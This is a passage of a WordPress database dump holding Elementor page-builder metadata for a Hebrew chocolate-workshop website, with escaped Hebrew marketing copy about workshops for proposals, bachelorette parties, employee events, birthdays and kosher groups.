\\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2322,434,'_elementor_edit_mode','builder'),(2323,434,'_elementor_template_type','wp-page'),(2324,434,'_elementor_version','2.7.5'),(2325,434,'_elementor_pro_version','2.7.3'),(2326,434,'_wp_page_template','elementor_header_footer'),(2327,434,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2328,434,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\",\"header_size\":\"h1\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":59,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 